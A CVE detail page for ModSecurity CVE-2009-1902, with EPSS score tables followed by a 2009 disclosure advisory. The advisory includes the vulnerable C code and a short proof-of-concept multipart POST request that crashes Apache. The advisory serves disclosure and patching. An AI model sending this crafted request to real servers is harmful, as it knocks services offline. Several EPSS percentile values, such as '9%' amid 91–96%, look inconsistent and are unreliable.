CVE-2009-1902 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	12.57%	–	–
2022-04-03	–	–	12.57%	–	–
2023-02-26	–	–	12.57%	–	–
2023-03-12	–	–	–	4.26%	–
2023-06-11	–	–	–	3.64%	–
2023-08-20	–	–	–	3.64%	–
2023-09-03	–	–	–	3.64%	–
2023-09-10	–	–	–	3.64%	–
2024-04-07	–	–	–	3.64%	–
2024-06-02	–	–	–	3.64%	–
2024-06-02	–	–	–	3.64%	–
2024-12-15	–	–	–	4.86%	–
2024-12-22	–	–	–	6.07%	–
2025-01-19	–	–	–	5.78%	–
2025-01-19	–	–	–	5.78%	–
2025-03-18	–	–	–	–	10.69%
2025-03-30	–	–	–	–	13.85%
2025-04-22	–	–	–	–	13.79%
2025-04-22	–	–	–	–	13.79,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	9%
2022-04-03	95%
2023-02-26	96%
2023-03-12	91%
2023-06-11	9%
2023-08-20	91%
2023-09-03	9%
2023-09-10	91%
2024-04-07	92%
2024-06-02	92%
2024-06-02	92%
2024-12-15	93%
2024-12-22	93%
2025-01-19	93%
2025-01-19	93%
2025-03-18	93%
2025-03-30	94%
2025-04-22	94%
2025-04-22	94%

============================================= INTERNET SECURITY AUDITORS ALERT 2009-001 - Original release date: February 25th, 2009 - Last revised: March 19th, 2009 - Discovered by: Juan Galiana Lara - Severity: 7.8/10 (CVSS Base Scored) ============================================= I. VULNERABILITY ------------------------- ModSecurity < 2.5.9 is vulnerable to a remote Denial of Service (DoS) II. BACKGROUND ------------------------- ModSecurity is the most widely-deployed web application firewall in the world, with more than 15,000 users. It runs as a Apache web server module and is developed by Breach Security [ http://www.breach.com ], it's avaliable with GNU GPL and many other comercial licenses. III. DESCRIPTION ------------------------- The multipart processor of modsecurity does not sanitize the user supplied input sufficiently. Therefore, an attacker can send a crafted post request of type multipart/form-data which will lead in a remote denial of service. The snippet of vulnerable code: in file msc_multipart.c 1256 int multipart_get_arguments(modsec_rec *msr, char *origin, apr_table_t *arguments) { 1257 multipart_part **parts; 1258 int i; 1259 1260 parts = (multipart_part **)msr->mpd->parts->elts; 1261 for(i = 0; i < msr->mpd->parts->nelts; i++) { 1262 if (parts[i]->type == MULTIPART_FORMDATA) { 1263 msc_arg *arg = (msc_arg *)apr_pcalloc(msr->mp, sizeof(msc_arg)); 1264 if (arg == NULL) return -1; 1265 1266 arg->name = parts[i]->name; 1267 arg->name_len = strlen(parts[i]->name); On line 1267, due to the pointer parts[i]->name is not properly sanitized the parameter of strlen function takes the value NULL, getting a segmentation fault and resulting in a crash of the apache process that handle the request. IV. PROOF OF CONCEPT ------------------------- The process could be crashed remotely by sending: POST / HTTP/1.0 Content-Type: multipart/form-data; boundary=---------------------------xxxxxxxxxxxxxx Content-Length: 91 -----------------------------xxxxxxxxxxxxxx : -----------------------------xxxxxxxxxxxxxx-- In order to send a correct HTTP/1.1 request you must add a valid Host header. With the configuration directives: SecAuditEngine On SecDebugLogLevel 9 After the attack, the last line of the debug logfile is: [25/Feb/2009:09:51:18 +0100] [vhost/sid#884348][rid#aaf0d8][/][9] Multipart: Added part abe458 to the list: name "(null)" (offset 0, length 0) V. BUSINESS IMPACT ------------------------- An attacker could cause a remote denial of service to an Apache installation with modsecurity 2 module. VI. SYSTEMS AFFECTED ------------------------- ModSecurity between 2.5.5 and 2.5.8 are vulnerable, other versions may be affected. Tested with Apache httpd 2.2.11. VII. SOLUTION ------------------------- Upgrade to version 2.5.9 of ModSecurity. It can be downloaded from http://modsecurity.org/download/ VIII. REFERENCES ------------------------- http://www.modsecurity.org http://www.isecauditors.com IX. CREDITS ------------------------- This vulnerability has been discovered by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com). Thanks to Jordi Rubió Romero (jrubio (at) isecauditorts (dot) com). X. REVISION HISTORY ------------------------- February 25, 2009: Initial release March 19, 2009: Revision. XI. DISCLOSURE TIMELINE ------------------------- Febraury 25, 2009: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com) March 02, 2009: ModSecurity contacted. March 02, 2009: Response about remediation plan. March 11, 2009: Path released March 19, 2009: Published. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information. # milw0rm.com [2009-03-19]